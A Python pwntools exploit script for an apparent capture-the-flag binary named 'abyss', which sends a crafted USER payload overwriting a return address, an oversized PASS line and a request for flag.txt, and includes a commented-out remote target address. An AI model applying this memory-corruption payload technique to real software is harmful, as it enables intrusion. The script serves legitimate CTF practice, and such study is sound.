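"""Driver script for the `abyss` challenge binary.

Using pwntools' tube API it starts the target, sends a 4-byte zero word,
a `USER ` line whose body is a fixed 32-byte layout ending in the 3-byte
`RET` value, a long `PASS ` line, then the string `flag.txt`, and finally
hands the tube to the operator with `interactive()`.
"""
from pwn import *
from pwnlib.util.cyclic import cyclic_gen
from pwnlib.util.fiddling import enhex, xor
from struct import pack
from pwnlib.util.cyclic import cyclic_gen  # duplicate of the import above; left in place

# Tube to the running target. Assigned by run() so it stays reachable at
# module level after the function has started the process.
p = None


def run() -> None:
    """Start the target and replay the scripted exchange, then go interactive.

    Side effects: rebinds module-level ``p``; ``pause()`` blocks for operator
    input three times; ``p.interactive()`` only returns once the tube closes.
    The offsets and the ``RET`` bytes are taken verbatim from the original
    script -- the target's layout is not visible here, so they are not
    re-derived.
    """
    global p
    chall = "./abyss"
    context.binary = chall
    context.log_level = 'debug'  # full tube traffic is logged
    p = process(chall)
    # p = remote("83.136.253.153", "58350")
    pause()

    # Three bytes that terminate the USER payload, sent as-is.
    # NOTE(review): little-endian these bytes decode to 0x4014eb; the
    # original comment said 0x401485 (which would be b'\x85\x14\x40').
    # Confirm which value is intended.
    RET = b'\xeb\x14\x40'

    # 32 bytes total: 17 filler bytes, one 0x1c byte, 11 filler bytes, RET.
    payload = b'a' * (0x5 + 0xc)
    payload += b'\x1c' + b'k' * 0xb + RET

    p.send(p32(0))
    p.send(b'USER ' + payload)
    pause()
    # 0x200 - 5 == 507 bytes after the 5-byte "PASS " prefix.
    p.send(b'PASS ' + b'b' * (0x200 - 5))
    pause()
    p.send(b'flag.txt')
    p.interactive()


if __name__ == "__main__":
    run()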